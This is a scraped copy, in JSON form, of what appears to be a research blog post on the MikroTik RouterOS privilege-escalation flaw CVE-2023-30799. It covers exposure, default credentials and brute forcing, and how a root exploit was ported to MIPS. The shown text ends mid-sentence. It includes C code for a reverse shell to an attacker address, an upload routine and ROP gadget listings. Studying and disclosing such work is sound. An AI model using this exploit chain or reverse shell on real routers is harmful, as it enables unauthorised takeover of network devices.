more","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-july-28-2023-at-least-8-million-americans-hit-in-the-latest-moveit-hack-and-more\u002F543783","2023-07-28",{"title":92181,"source":84069,"link":92182,"date":92183},"Week in review: Ivanti zero-day exploited, MikroTik vulnerability could compromise 900,000 routers","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2023\u002F07\u002F30\u002Fweek-in-review-ivanti-zero-day-exploited-mikrotik-vulnerability-could-compromise-900000-routers\u002F","2023-07-30",{"title":92185,"source":92186,"link":92187,"date":92183},"Disruptive Chinese malware, Storm-0558 fallout and SEC cyber 
rules","README_","https:\u002F\u002Freadme.synack.com\u002Fdisruptive-chinese-malware-storm-0558-fallout-and-sec-cyber-rules",{"title":92189,"source":3481,"link":92190,"date":92183},"US senator victim-blames Microsoft for Chinese hack","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F07\u002F31\u002Finfosec_in_brief\u002F",{"title":92192,"source":81116,"link":92193,"date":92194},"THIS WEEK IN SECURITY: YOUR CAR’S EXTENDED WARRANTY, SEIZING THE FEDIVERSE, AND ARM MTE","https:\u002F\u002Fhackaday.com\u002F2023\u002F08\u002F04\u002Fthis-week-in-security-your-cars-extended-warranty-seizing-the-fediverse-and-arm-mte\u002F","2023-08-04",{"title":92196,"source":23286,"link":92197,"date":92198},"Your SOHO Router is a Juicy Target for Hackers","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F08\u002Fyour-soho-router-is-a-juicy-target-for-hackers\u002F","2024-08-14",[92200],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":92202,"toc":93253},[92203,92218,92221,92253,92256,92261,92268,92273,92277,92290,92296,92299,92303,92306,92321,92327,92338,92341,92355,92361,92374,92383,92389,92392,92396,92399,92414,92417,92421,92424,92464,92492,92636,92639,92658,92661,92669,92678,92994,93001,93005,93008,93028,93045,93082,93087,93142,93151,93166,93169,93173,93176,93184,93187,93190,93214,93217,93219,93236,93247,93250],[18,92204,92205,92206,92211,92212,92217],{},"Up until version 6.49.8 (July 20, 2023), MikroTik ",[47,92207,92210],{"href":92208,"rel":92209},"https:\u002F\u002Fmikrotik.com\u002Fsoftware",[51],"RouterOS"," Long-term was vulnerable to ",[47,92213,92216],{"href":92214,"rel":92215},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-30799",[51],"CVE-2023-30799",". 
Remote and authenticated attackers can use the vulnerability to get a root shell on the router.",[33917,92219],{"id":92220,"title":83451},"kLC1fuGqDJY",[18,92222,92223,92224,26138,92229,92234,92235,92240,92241,92246,92247,92252],{},"CVE-2023-30799 was first disclosed, without a CVE, in ",[47,92225,92228],{"href":92226,"rel":92227},"https:\u002F\u002Frecon.cx\u002F2022\u002Fconference.html",[51],"June 2022",[47,92230,92233],{"href":92231,"rel":92232},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=zLAQhIc7GJI",[51],"REcon"," by ",[47,92236,92239],{"href":92237,"rel":92238},"https:\u002F\u002Fmargin.re\u002F",[51],"Margin Research"," employees, Ian Dupont and ",[47,92242,92245],{"href":92243,"rel":92244},"https:\u002F\u002Ftwitter.com\u002Fhgarrereyn",[51],"Harrison Green",". At that time, they released an exploit called ",[47,92248,92251],{"href":92249,"rel":92250},"https:\u002F\u002Fgithub.com\u002FMarginResearch\u002FFOISted",[51],"FOISted"," that can obtain a root shell on the RouterOS x86 virtual machine. A CVE was assigned last week (July 19, 2023) when VulnCheck researchers published new exploits that attacked a wider range of MikroTik hardware.",[18,92254,92255],{},"MikroTik has been aware of the issue for some time. In October 2022, they fixed the problem in RouterOS stable (6.49.7). The release notes don’t indicate a security problem was addressed, but this tidbit alludes to the fix:",[1925,92257,92258],{},[18,92259,92260],{},"*) system - improved handling of user policies;",[18,92262,92263,92264,59],{},"A patch for RouterOS Long-term only arrived after VulnCheck reached out to the vendor. 
On July 18, VulnCheck found that RouterOS Long-term 6.48.6 (the most recent Long-term at the time) was the second most installed RouterOS version according to ",[47,92265,41731],{"href":92266,"rel":92267},"https:\u002F\u002Fwww.shodan.io\u002Fsearch\u002Ffacet?query=os%3A%22RouterOS%22&facet=os",[51],[1925,92269,92270],{},[18,92271,92272],{},"Top 10 RouterOS Versions (Shodan on July 18, 2023)",[11128,92274],{":labels":92275,":values":92276},"[\"6.49.7\",\"6.48.6\",\"6.49.6\",\"6.49.8\",\"6.47.10\",\"6.45.9\",\"6.48.3\",\"6.47.9\",\"6.49.2\"]","[168649,163274,107133,71634,47518,46751,41266,38163,35315]",[18,92278,92279,92280,982,92284,92289],{},"In total, Shodan indexes approximately ",[47,92281,84210],{"href":92282,"rel":92283},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22RouterOS+router+configuration+page%22+-%22X-Frame-Options%22++-os%3A%22MikroTik+RouterOS+6.49.7%22+-os%3A%22MikroTik+RouterOS+6.49.8%22",[51],[47,92285,92288],{"href":92286,"rel":92287},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=product%3A%22MikroTik+Winbox%22+-os%3A%22MikroTik+RouterOS+6.49.7%22+-os%3A%22MikroTik+RouterOS+6.49.8%22+",[51],"900,000"," RouterOS systems vulnerable to CVE-2023-30799 via their web and\u002For Winbox interfaces respectively.",[18,92291,92292],{},[68,92293],{":width":10862,"alt":92294,"src":92295},"Mikrotik web on Shodan","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fmt-web-shodan.png",[18,92297,92298],{},"Which means that the vulnerability could have far reaching effects.",[61,92300,92302],{"id":92301},"authentication-required-but-still-dangerous","Authentication Required, But Still Dangerous",[18,92304,92305],{},"CVE-2023-30799 does require authentication. In fact, the vulnerability itself is a simple privilege escalation from admin to “super-admin” which results in access to an arbitrary function call. But this vulnerability should not be dismissed because authentication is required. We believe that this is a dangerous vulnerability. 
Acquiring credentials to RouterOS systems is easier than one might expect.",[18,92307,92308,92309,92314,92315,92320],{},"RouterOS ships with a fully functional “admin” user. ",[47,92310,92313],{"href":92311,"rel":92312},"https:\u002F\u002Fwiki.mikrotik.com\u002Fwiki\u002FManual:Securing_Your_Router",[51],"Hardening guidance"," tells administrators to delete the “admin” user, but we know a large number of installations haven’t. We know this because the Winbox authentication scheme is vulnerable to a classic example of observable response discrepancy (",[47,92316,92319],{"href":92317,"rel":92318},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F204.html",[51],"CWE-204","). During authentication, RouterOS will send a smaller response when the provided username doesn’t exist.",[18,92322,92323],{},[68,92324],{":width":10862,"alt":92325,"src":92326},"Winbox responses to login attempts","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fmt-winbox-leak.png",[18,92328,92329,92330,92335,92336,4530],{},"We ",[47,92331,92334],{"href":92332,"rel":92333},"https:\u002F\u002Fgist.github.com\u002Fj-baines\u002Fc484fc2988123bc4626efea74c316615",[51],"probed"," a sample of hosts on Shodan (n=5500) and found that nearly 60% still used the default ",[886,92337,5800],{},[18,92339,92340],{},"To make matters worse, the default “admin” password is an empty string, and it wasn’t until RouterOS 6.49 (October 2021) that RouterOS started prompting administrators to update blank passwords. Even when an administrator has set a new password, RouterOS doesn’t enforce any restrictions. Administrators are free to set any password they choose, no matter how simple. That’s particularly unfortunate because the system doesn’t offer any brute force protection (except on the SSH interface).",[18,92342,92343,92344,92349,92350,92354],{},"It’s not as if brute force attacks on RouterOS are unheard of, either. 
There's a ",[47,92345,92348],{"href":92346,"rel":92347},"https:\u002F\u002Fhelp.mikrotik.com\u002Fdocs\u002Fdisplay\u002FROS\u002FAPI",[51],"RouterOS API"," brute forcing tool that’s over a decade old. ",[47,92351,86601],{"href":92352,"rel":92353},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Frouteros-bruteforcer-attempt?days=30",[51]," shows that RouterOS API brute forcing is incredibly active.",[18,92356,92357],{},[68,92358],{":width":10862,"alt":92359,"src":92360},"Greynoise RouterOS Bruteforcer Tag","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fgreynoise-mt-bruteforce.png",[18,92362,92363,92367,92368,92373],{},[47,92364,41731],{"href":92365,"rel":92366},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=product%3A%22MikroTik+RouterOS+API+Service%22",[51]," shows far fewer routers expose their API port (~400,000) compared to the web or Winbox interfaces, so it’s useful to note that web and Winbox brute forcing ",[47,92369,92372],{"href":92370,"rel":92371},"https:\u002F\u002Fgithub.com\u002Ftenable\u002Frouteros\u002Ftree\u002Fmaster\u002Fbrute_force",[51],"tools"," have existed since 2019. Although they became obsolete when MikroTik changed their authentication schemes around RouterOS 6.45.",[18,92375,92376,92377,92382],{},"However, because Margin Research reverse-engineered the newest web interface authentication, we are free to resume brute force activities on that interface once again. To demonstrate that, we quickly threw together a simple dictionary brute force ",[47,92378,92381],{"href":92379,"rel":92380},"https:\u002F\u002Fgithub.com\u002Fj-baines\u002Feven-you-brutus",[51],"tool"," that works against RouterOS versions up to the latest 6.x release. Below is a screenshot of the logs from an attacked router. 
Note that the router saw multiple login attempts every second from the same source.",[18,92384,92385],{},[68,92386],{":width":10862,"alt":92387,"src":92388},"Brute force login attempts","\u002Fblog\u002Fmikrotik-foisted-revisited\u002Fbruteforce-logs.png",[18,92390,92391],{},"All of this is to say, RouterOS suffers from a variety of issues that make guessing administrative credentials easier than it should be. We believe CVE-2023-30799 is much easier to exploit than the CVSS vector indicates.",[61,92393,92395],{"id":92394},"why-did-this-fly-under-the-radar","Why Did This Fly Under the Radar?",[18,92397,92398],{},"Margin Research’s FOISted exploit, while well done, only works on the RouterOS x86 virtual machine, which is likely the least deployed version of the software. Perhaps this is what elicited the lackluster response from the vendor. FOISted would have received more attention if it was developed for MikroTik hardware. Successful attacks on hardware are a big deal, because they have widespread real-world applications. Exploiting the x86 VM does not.",[18,92400,92401,92402,92407,92408,92413],{},"To our knowledge, there hasn’t been a public method for obtaining a root shell on MikroTik hardware for quite some time. There were several methods up until RouterOS 6.46 (2019), but they’ve all been stomped out. ",[47,92403,92406],{"href":92404,"rel":92405},"https:\u002F\u002Fteamt5.org\u002Fen\u002Fposts\u002Fvulnerability-mikrotik-cve-2021-41987\u002F",[51],"CVE-2021-41987"," was used in the wild for a time (no public exploit), but that’s been fixed for two years now. 
More recently, during pwn2own, DEVCORE team members popped RouterOS with ",[47,92409,92412],{"href":92410,"rel":92411},"https:\u002F\u002Fwww.zerodayinitiative.com\u002Fadvisories\u002FZDI-23-710\u002F",[51],"CVE-2023-32154",", but exploitation requires IPv6 to be enabled, and the attacker be on the same network (also no public exploit).",[18,92415,92416],{},"MIPSBE is likely the most popular architecture for MikroTik hardware (although they also have various devices that use MIPSLE, ARM, and PowerPC), so we took on the task of porting the exploit to MIPSBE.",[61,92418,92420],{"id":92419},"simplification-and-practical-issues","Simplification and Practical Issues",[18,92422,92423],{},"Our first step to porting FOISted was to simplify the exploit. This is a general outline of how FOISted x86 works:",[1789,92425,92426,92429,92458,92461],{},[25,92427,92428],{},"Upload a stage2 executable and a statically linked busybox via FTP.",[25,92430,92431,92432,92434,92435,92437,92438,982,92440,92443,92444,59,92446,92448,92449,92452,92454,92455],{},"Craft a ROP Chain:",[1823,92433],{},"a. Using a write primitive, write \u002Fflash\u002Frw\u002Fdisk\u002Fstage2 to a predefined memory location.",[1823,92436],{},"b. Calculate addresses of ",[886,92439,31890],{},[886,92441,92442],{},"execl"," in uclibc using the offsets from ",[886,92445,75402],{},[1823,92447],{},"c. ",[886,92450,92451],{},"chmod(“\u002Fflash\u002Frw\u002Fdisk\u002Fstage2”, 777)",[1823,92453],{},"d. ",[886,92456,92457],{},"execve(“\u002Fflash\u002Frw\u002Fdisk\u002Fstage2”, NULL, NULL)",[25,92459,92460],{},"Stage2 makes the uploaded busybox executable",[25,92462,92463],{},"Stage2 creates a bindshell using the uploaded busybox",[18,92465,92466,92467,92469,92470,20559,92473,14193,92476,92478,92479,92482,92483,92485,92486,92491],{},"There is a significant amount of register shuffling in order to achieve all of that. We settled on a far easier approach. 
We save ourselves a lot of trouble by changing the stage2 executable to a shared object. This allows us to skip ",[886,92468,31890],{},", and replace ",[886,92471,92472],{},"execve",[886,92474,92475],{},"dlopen",[886,92477,92475],{}," is referenced by the vulnerable binary (",[886,92480,92481],{},"\u002Fnova\u002Fbin\u002Fwww",") so offsets into uclibc don’t have to be calculated. We can execute arbitrary code via ",[886,92484,92475],{}," by creating a function with a ",[47,92487,92490],{"href":92488,"rel":92489},"https:\u002F\u002Fgcc.gnu.org\u002Fonlinedocs\u002Fgcc-4.7.0\u002Fgcc\u002FFunction-Attributes.html",[51],"constructor attribute",". Something like this:",[1354,92493,92496],{"className":92494,"code":92495,"language":28578,"meta":219,"style":219},"language-c shiki shiki-themes material-theme-lighter github-light github-dark monokai","#include \u003Cstdio.h>\n#include \u003Cunistd.h>\n#include \u003Cnetinet\u002Fin.h>\n#include \u003Carpa\u002Finet.h>\n#include \u003Csys\u002Fstat.h>\n#include \u003Csys\u002Ftypes.h>\n#include \u003Csys\u002Fsocket.h>\n\nstatic void before_main(void) __attribute__((constructor));\n\nstatic void before_main(void)\n{\n chmod(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", 0777);\n struct sockaddr_in sa;\n int s;\n\n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = inet_addr(\"10.12.70.252\");\n sa.sin_port = htons(1270);\n\n s = socket(AF_INET, SOCK_STREAM, 0);\n connect(s, (struct sockaddr *)&sa, sizeof(sa));\n dup2(s, 0);\n dup2(s, 1);\n dup2(s, 2);\n\n char * const argv[] = { \"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", \"ash\", \"-i\", NULL };\n execve(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", argv, NULL);\n}\n",[886,92497,92498,92503,92508,92513,92518,92523,92528,92533,92537,92542,92546,92551,92555,92560,92565,92570,92574,92579,92584,92589,92593,92598,92603,92608,92613,92618,92622,92627,92632],{"__ignoreMap":219},[1373,92499,92500],{"class":1375,"line":1376},[1373,92501,92502],{},"#include 
\u003Cstdio.h>\n",[1373,92504,92505],{"class":1375,"line":220},[1373,92506,92507],{},"#include \u003Cunistd.h>\n",[1373,92509,92510],{"class":1375,"line":1266},[1373,92511,92512],{},"#include \u003Cnetinet\u002Fin.h>\n",[1373,92514,92515],{"class":1375,"line":1852},[1373,92516,92517],{},"#include \u003Carpa\u002Finet.h>\n",[1373,92519,92520],{"class":1375,"line":4692},[1373,92521,92522],{},"#include \u003Csys\u002Fstat.h>\n",[1373,92524,92525],{"class":1375,"line":4724},[1373,92526,92527],{},"#include \u003Csys\u002Ftypes.h>\n",[1373,92529,92530],{"class":1375,"line":4756},[1373,92531,92532],{},"#include \u003Csys\u002Fsocket.h>\n",[1373,92534,92535],{"class":1375,"line":4768},[1373,92536,6520],{"emptyLinePlaceholder":237},[1373,92538,92539],{"class":1375,"line":4792},[1373,92540,92541],{},"static void before_main(void) __attribute__((constructor));\n",[1373,92543,92544],{"class":1375,"line":4798},[1373,92545,6520],{"emptyLinePlaceholder":237},[1373,92547,92548],{"class":1375,"line":4806},[1373,92549,92550],{},"static void before_main(void)\n",[1373,92552,92553],{"class":1375,"line":4817},[1373,92554,8904],{},[1373,92556,92557],{"class":1375,"line":4825},[1373,92558,92559],{}," chmod(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", 0777);\n",[1373,92561,92562],{"class":1375,"line":4835},[1373,92563,92564],{}," struct sockaddr_in sa;\n",[1373,92566,92567],{"class":1375,"line":4843},[1373,92568,92569],{}," int s;\n",[1373,92571,92572],{"class":1375,"line":4849},[1373,92573,6520],{"emptyLinePlaceholder":237},[1373,92575,92576],{"class":1375,"line":4877},[1373,92577,92578],{}," sa.sin_family = AF_INET;\n",[1373,92580,92581],{"class":1375,"line":4915},[1373,92582,92583],{}," sa.sin_addr.s_addr = inet_addr(\"10.12.70.252\");\n",[1373,92585,92586],{"class":1375,"line":4931},[1373,92587,92588],{}," sa.sin_port = 
htons(1270);\n",[1373,92590,92591],{"class":1375,"line":4947},[1373,92592,6520],{"emptyLinePlaceholder":237},[1373,92594,92595],{"class":1375,"line":4952},[1373,92596,92597],{}," s = socket(AF_INET, SOCK_STREAM, 0);\n",[1373,92599,92600],{"class":1375,"line":6776},[1373,92601,92602],{}," connect(s, (struct sockaddr *)&sa, sizeof(sa));\n",[1373,92604,92605],{"class":1375,"line":6781},[1373,92606,92607],{}," dup2(s, 0);\n",[1373,92609,92610],{"class":1375,"line":7524},[1373,92611,92612],{}," dup2(s, 1);\n",[1373,92614,92615],{"class":1375,"line":7530},[1373,92616,92617],{}," dup2(s, 2);\n",[1373,92619,92620],{"class":1375,"line":7546},[1373,92621,6520],{"emptyLinePlaceholder":237},[1373,92623,92624],{"class":1375,"line":7571},[1373,92625,92626],{}," char * const argv[] = { \"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", \"ash\", \"-i\", NULL };\n",[1373,92628,92629],{"class":1375,"line":7598},[1373,92630,92631],{}," execve(\"\u002Fflash\u002Frw\u002Fdisk\u002Fbusybox\", argv, NULL);\n",[1373,92633,92634],{"class":1375,"line":7615},[1373,92635,1855],{},[18,92637,92638],{},"With those changes, the x86 exploit is simplified to this:",[1789,92640,92641,92643,92654,92656],{},[25,92642,92428],{},[25,92644,92431,92645,92647,92648,92650,92651],{},[1823,92646],{},"a. Using a write primitive, write \u002Fflash\u002Frw\u002Fdisk\u002Fstage2 to a predefined memory location",[1823,92649],{},"b. Call ",[886,92652,92653],{},"dlopen(“\u002Fflash\u002Frw\u002Fdisk\u002Fstage2, 1)",[25,92655,92460],{},[25,92657,92463],{},[18,92659,92660],{},"There are still some issues here, though. The exploit isn’t practical for most real-world scenarios. Specifically:",[1789,92662,92663,92666],{},[25,92664,92665],{},"Most real world targets don’t expose the FTP interface.",[25,92667,92668],{},"A bindshell is typically going to be blocked\u002Ffiltered and inaccessible.",[18,92670,92671,92672,92677],{},"Both issues are fairly easy to solve. 
First, the RouterOS web interface allows authenticated users to upload files to a persistent storage area. Nothing is straightforward when it comes to RouterOS, but the file upload logic is fairly reasonable, and we were able to work it into Margin Research’s ",[47,92673,92676],{"href":92674,"rel":92675},"https:\u002F\u002Fgithub.com\u002FMarginResearch\u002FFOISted\u002Fblob\u002Fmaster\u002Fwebfig.py",[51],"webfig.py"," seamlessly.",[1354,92679,92681],{"className":11719,"code":92680,"language":11721,"meta":219,"style":219},"def upload(self, filename: bytes, data: bytes):\n  enc = self.tx.encrypt(filename) + self.tx.encrypt(b'\\x20' * 8)\n  enc = web_encode(enc)\n  packed = self.tracker.pack(enc)\n  param = urllib.parse.quote(packed)\n\n  files = {'file': (filename, data)}\n\n  r = requests.post(url = \"http:\u002F\u002F\" + self.host + \"\u002Fjsproxy\u002Fupload?\" + param, files=files)\n  if r.status_code != 200:\n    print(r.content)\n    raise ValueError(f'Status code: {r.status_code}')\n",[886,92682,92683,92714,92769,92785,92810,92836,92840,92868,92872,92932,92950,92964],{"__ignoreMap":219},[1373,92684,92685,92687,92690,92692,92695,92697,92700,92702,92704,92706,92708,92710,92712],{"class":1375,"line":1376},[1373,92686,78600],{"class":7293},[1373,92688,92689],{"class":7297}," upload",[1373,92691,1384],{"class":1383},[1373,92693,76212],{"class":92694},"sDdYn",[1373,92696,5437],{"class":1383},[1373,92698,55713],{"class":92699},"sW6vx",[1373,92701,4606],{"class":1383},[1373,92703,57298],{"class":9165},[1373,92705,5437],{"class":1383},[1373,92707,57295],{"class":92699},[1373,92709,4606],{"class":1383},[1373,92711,57298],{"class":9165},[1373,92713,78758],{"class":1383},[1373,92715,92716,92719,92721,92724,92726,92729,92731,92733,92735,92737,92739,92741,92743,92745,92747,92749,92751,92753,92755,92757,92760,92762,92764,92767],{"class":1375,"line":220},[1373,92717,92718],{"class":4640},"  enc ",[1373,92720,5417],{"class":1397},[1373,92722,92723],{"class":6761}," 
self",[1373,92725,59],{"class":1383},[1373,92727,92728],{"class":63570},"tx",[1373,92730,59],{"class":1383},[1373,92732,51501],{"class":11735},[1373,92734,1384],{"class":1383},[1373,92736,9588],{"class":11735},[1373,92738,2230],{"class":1383},[1373,92740,15478],{"class":1397},[1373,92742,92723],{"class":6761},[1373,92744,59],{"class":1383},[1373,92746,92728],{"class":63570},[1373,92748,59],{"class":1383},[1373,92750,51501],{"class":11735},[1373,92752,1384],{"class":1383},[1373,92754,74424],{"class":7293},[1373,92756,1388],{"class":1387},[1373,92758,92759],{"class":2326},"\\x20",[1373,92761,1388],{"class":1387},[1373,92763,19113],{"class":1397},[1373,92765,92766],{"class":5467}," 8",[1373,92768,11875],{"class":1383},[1373,92770,92771,92773,92775,92778,92780,92783],{"class":1375,"line":1266},[1373,92772,92718],{"class":4640},[1373,92774,5417],{"class":1397},[1373,92776,92777],{"class":11735}," web_encode",[1373,92779,1384],{"class":1383},[1373,92781,92782],{"class":11735},"enc",[1373,92784,11875],{"class":1383},[1373,92786,92787,92790,92792,92794,92796,92799,92801,92804,92806,92808],{"class":1375,"line":1852},[1373,92788,92789],{"class":4640},"  packed ",[1373,92791,5417],{"class":1397},[1373,92793,92723],{"class":6761},[1373,92795,59],{"class":1383},[1373,92797,92798],{"class":63570},"tracker",[1373,92800,59],{"class":1383},[1373,92802,92803],{"class":11735},"pack",[1373,92805,1384],{"class":1383},[1373,92807,92782],{"class":11735},[1373,92809,11875],{"class":1383},[1373,92811,92812,92815,92817,92819,92821,92824,92826,92829,92831,92834],{"class":1375,"line":4692},[1373,92813,92814],{"class":4640},"  param 
",[1373,92816,5417],{"class":1397},[1373,92818,78935],{"class":4640},[1373,92820,59],{"class":1383},[1373,92822,92823],{"class":63570},"parse",[1373,92825,59],{"class":1383},[1373,92827,92828],{"class":11735},"quote",[1373,92830,1384],{"class":1383},[1373,92832,92833],{"class":11735},"packed",[1373,92835,11875],{"class":1383},[1373,92837,92838],{"class":1375,"line":4724},[1373,92839,6520],{"emptyLinePlaceholder":237},[1373,92841,92842,92845,92847,92849,92851,92853,92855,92857,92859,92861,92863,92865],{"class":1375,"line":4756},[1373,92843,92844],{"class":4640},"  files ",[1373,92846,5417],{"class":1397},[1373,92848,5420],{"class":1383},[1373,92850,1388],{"class":1387},[1373,92852,85692],{"class":1391},[1373,92854,1388],{"class":1387},[1373,92856,4606],{"class":1383},[1373,92858,4641],{"class":1383},[1373,92860,9588],{"class":4640},[1373,92862,5437],{"class":1383},[1373,92864,57295],{"class":4640},[1373,92866,92867],{"class":1383},")}\n",[1373,92869,92870],{"class":1375,"line":4768},[1373,92871,6520],{"emptyLinePlaceholder":237},[1373,92873,92874,92877,92879,92882,92884,92886,92888,92890,92892,92894,92896,92898,92900,92902,92904,92906,92908,92910,92913,92915,92917,92920,92922,92925,92927,92930],{"class":1375,"line":4792},[1373,92875,92876],{"class":4640},"  r ",[1373,92878,5417],{"class":1397},[1373,92880,92881],{"class":4640}," requests",[1373,92883,59],{"class":1383},[1373,92885,46577],{"class":11735},[1373,92887,1384],{"class":1383},[1373,92889,7585],{"class":19096},[1373,92891,8575],{"class":1397},[1373,92893,4883],{"class":1387},[1373,92895,87009],{"class":1391},[1373,92897,183],{"class":1387},[1373,92899,15478],{"class":1397},[1373,92901,92723],{"class":6761},[1373,92903,59],{"class":1383},[1373,92905,63614],{"class":63570},[1373,92907,15478],{"class":1397},[1373,92909,4883],{"class":1387},[1373,92911,92912],{"class":1391},"\u002Fjsproxy\u002Fupload?",[1373,92914,183],{"class":1387},[1373,92916,15478],{"class":1397},[1373,92918,92919],{"class":11735}," 
param",[1373,92921,5437],{"class":1383},[1373,92923,92924],{"class":19096}," files",[1373,92926,5417],{"class":1397},[1373,92928,92929],{"class":11735},"files",[1373,92931,11875],{"class":1383},[1373,92933,92934,92937,92939,92941,92944,92946,92948],{"class":1375,"line":4798},[1373,92935,92936],{"class":4636},"  if",[1373,92938,19110],{"class":4640},[1373,92940,59],{"class":1383},[1373,92942,92943],{"class":63570},"status_code",[1373,92945,34516],{"class":1397},[1373,92947,6610],{"class":5467},[1373,92949,11747],{"class":1383},[1373,92951,92952,92954,92956,92958,92960,92962],{"class":1375,"line":4806},[1373,92953,63893],{"class":1379},[1373,92955,1384],{"class":1383},[1373,92957,11872],{"class":11735},[1373,92959,59],{"class":1383},[1373,92961,13389],{"class":63570},[1373,92963,11875],{"class":1383},[1373,92965,92966,92969,92972,92974,92977,92980,92982,92984,92986,92988,92990,92992],{"class":1375,"line":4817},[1373,92967,92968],{"class":4636},"    raise",[1373,92970,92971],{"class":9165}," ValueError",[1373,92973,1384],{"class":1383},[1373,92975,92976],{"class":7293},"f",[1373,92978,92979],{"class":1391},"'Status code: ",[1373,92981,9149],{"class":5467},[1373,92983,11872],{"class":11735},[1373,92985,59],{"class":1383},[1373,92987,92943],{"class":63570},[1373,92989,28575],{"class":5467},[1373,92991,1388],{"class":1391},[1373,92993,11875],{"class":1383},[18,92995,92996,92997,93000],{},"The bind shell issue is also trivial. We simply changed “stage2” to send out a single reverse shell (see the C code above). This has the added benefit of cleanly exiting when the attacker is done with the reverse shell, which allows ",[886,92998,92999],{},"www"," to respawn (and prevents an autosupout.rif from being generated).",[61,93002,93004],{"id":93003},"finding-a-mips-rop-chain","Finding a MIPS ROP Chain",[18,93006,93007],{},"Now with a simplified approach, the individual MIPS gadgets become easy to find. 
The ROP chain is generally reduced to:",[1789,93009,93010,93017,93023],{},[25,93011,93012,93013,93016],{},"Move ",[886,93014,93015],{},"$sp"," to attacker controlled data.",[25,93018,93019,93020,59],{},"Move an attacker controlled filename to ",[886,93021,93022],{},"$a0",[25,93024,93025,93026,59],{},"Call ",[886,93027,92475],{},[18,93029,93030,93031,1246,93033,1255,93036,93039,93040,93042,93043,4606],{},"The gadgets can be reliably found in three functions for all the versions of RouterOS we tested (6.40 up to 6.49.6): ",[886,93032,46531],{},[886,93034,93035],{},"www::Server::get",[886,93037,93038],{},"loadServlet",". First, to move ",[886,93041,93015],{}," to the attacker controlled data, we can use the epilogue of ",[886,93044,46531],{},[1354,93046,93050],{"className":93047,"code":93048,"language":93049,"meta":219,"style":219},"language-asm shiki shiki-themes material-theme-lighter github-light github-dark monokai","0x0040acbc \u003C+728>:    lw    ra,1540(sp)\n0x0040acc0 \u003C+732>:    lw    s1,1536(sp)\n0x0040acc4 \u003C+736>:    lw    s0,1532(sp)\n0x0040acc8 \u003C+740>:    move    v0,zero\n0x0040accc \u003C+744>:    jr    ra\n0x0040acd0 \u003C+748>:    addiu    sp,sp,1544\n","asm",[886,93051,93052,93057,93062,93067,93072,93077],{"__ignoreMap":219},[1373,93053,93054],{"class":1375,"line":1376},[1373,93055,93056],{},"0x0040acbc \u003C+728>:    lw    ra,1540(sp)\n",[1373,93058,93059],{"class":1375,"line":220},[1373,93060,93061],{},"0x0040acc0 \u003C+732>:    lw    s1,1536(sp)\n",[1373,93063,93064],{"class":1375,"line":1266},[1373,93065,93066],{},"0x0040acc4 \u003C+736>:    lw    s0,1532(sp)\n",[1373,93068,93069],{"class":1375,"line":1852},[1373,93070,93071],{},"0x0040acc8 \u003C+740>:    move    v0,zero\n",[1373,93073,93074],{"class":1375,"line":4692},[1373,93075,93076],{},"0x0040accc \u003C+744>:    jr    ra\n",[1373,93078,93079],{"class":1375,"line":4724},[1373,93080,93081],{},"0x0040acd0 \u003C+748>:    addiu    
sp,sp,1544\n",[18,93083,93084,93085,4606],{},"Then to move an attacker controlled string into $a0 we use the epilogue of ",[886,93086,93035],{},[1354,93088,93090],{"className":93047,"code":93089,"language":93049,"meta":219,"style":219},"0x0040c514 \u003C+620>:    addiu    a0,sp,44\n0x0040c518 \u003C+624>:    lw    ra,76(sp)\n0x0040c51c \u003C+628>:    move    v0,s1\n0x0040c520 \u003C+632>:    lw    s4,72(sp)\n0x0040c524 \u003C+636>:    lw    s3,68(sp)\n0x0040c528 \u003C+640>:    lw    s2,64(sp)\n0x0040c52c \u003C+644>:    lw    s1,60(sp)\n0x0040c530 \u003C+648>:    lw    s0,56(sp)\n0x0040c534 \u003C+652>:    jr    ra\n0x0040c538 \u003C+656>:    addiu    sp,sp,80\n",[886,93091,93092,93097,93102,93107,93112,93117,93122,93127,93132,93137],{"__ignoreMap":219},[1373,93093,93094],{"class":1375,"line":1376},[1373,93095,93096],{},"0x0040c514 \u003C+620>:    addiu    a0,sp,44\n",[1373,93098,93099],{"class":1375,"line":220},[1373,93100,93101],{},"0x0040c518 \u003C+624>:    lw    ra,76(sp)\n",[1373,93103,93104],{"class":1375,"line":1266},[1373,93105,93106],{},"0x0040c51c \u003C+628>:    move    v0,s1\n",[1373,93108,93109],{"class":1375,"line":1852},[1373,93110,93111],{},"0x0040c520 \u003C+632>:    lw    s4,72(sp)\n",[1373,93113,93114],{"class":1375,"line":4692},[1373,93115,93116],{},"0x0040c524 \u003C+636>:    lw    s3,68(sp)\n",[1373,93118,93119],{"class":1375,"line":4724},[1373,93120,93121],{},"0x0040c528 \u003C+640>:    lw    s2,64(sp)\n",[1373,93123,93124],{"class":1375,"line":4756},[1373,93125,93126],{},"0x0040c52c \u003C+644>:    lw    s1,60(sp)\n",[1373,93128,93129],{"class":1375,"line":4768},[1373,93130,93131],{},"0x0040c530 \u003C+648>:    lw    s0,56(sp)\n",[1373,93133,93134],{"class":1375,"line":4792},[1373,93135,93136],{},"0x0040c534 \u003C+652>:    jr    ra\n",[1373,93138,93139],{"class":1375,"line":4798},[1373,93140,93141],{},"0x0040c538 \u003C+656>:    addiu    sp,sp,80\n",[18,93143,93144,93145,93147,93148,93150],{},"Finally, to call into 
